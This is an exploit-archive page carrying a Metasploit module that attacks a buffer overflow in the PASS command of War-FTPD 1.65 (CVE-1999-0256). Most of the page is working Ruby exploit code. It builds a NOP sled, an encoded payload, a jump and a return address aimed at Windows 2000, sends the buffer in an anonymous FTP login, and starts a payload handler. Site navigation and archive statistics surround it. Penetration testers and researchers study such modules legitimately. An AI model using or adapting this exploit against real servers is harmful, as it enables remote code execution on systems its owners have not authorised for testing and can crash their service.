War-FTPD 1.65 Password Overflow

War-FTPD 1.65 Password Overflow: Posted Nov 26, 2009; Authored by H D Moore | Site metasploit.com; This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. A failed attempt will bring down the service completely.; tags | exploit, overflow; systems | windows; advisories | CVE-1999-0256; SHA-256 | 3eaff6b9ba8c0e78ff3fe3fd0e216a7c7c28d1e306176078e34609db67f6677c; Download | Favorite | View

War-FTPD 1.65 Password Overflow

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'War-FTPD 1.65 Password Overflow',
      'Description'    => %q{
        This exploits the buffer overflow found in the PASS command
        in War-FTPD 1.65. This particular module will only work
        reliably against Windows 2000 targets. The server must be
        configured to allow anonymous logins for this exploit to
        succeed. A failed attempt will bring down the service
        completely.
      },
      'Author'         => 'hdm',
      'License'        => BSD_LICENSE,
      'Version'        => '$Revision$',
      'References'     => 
        [
          [ 'CVE', '1999-0256'],
          [ 'OSVDB', '875'    ],
          [ 'BID', '10078'  ],
          [ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
        ],
      'DefaultOptions' => 
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'    => 424,
          'BadChars' => "\x00\x0a\x0d\x40",
          'StackAdjustment' => -3500,
          'Compat'   =>
            {
              'ConnectionType' => "-find"
            }
        },
      'Targets'        =>
        [
          # Target 0
          [
            'Windows 2000',
            {
              'Platform' => 'win',
              'Ret'      => 0x5f4e772b # jmp ebx in the included MFC42.DLL
            },
          ],
        ]))

  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    buf          = make_nops(566) + payload.encoded
    buf[558, 2]  = "\xeb\x06"
    buf[562, 4]  = [ target.ret ].pack('V')

    # Send USER Command
    send_user(datastore['FTPUSER'])

    # Send PASS Command
    send_cmd(['PASS', buf], false)

    handler
    disconnect
  end

end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

War-FTPD 1.65 Password Overflow

War-FTPD 1.65 Password Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

War-FTPD 1.65 Password Overflow

Share This

War-FTPD 1.65 Password Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems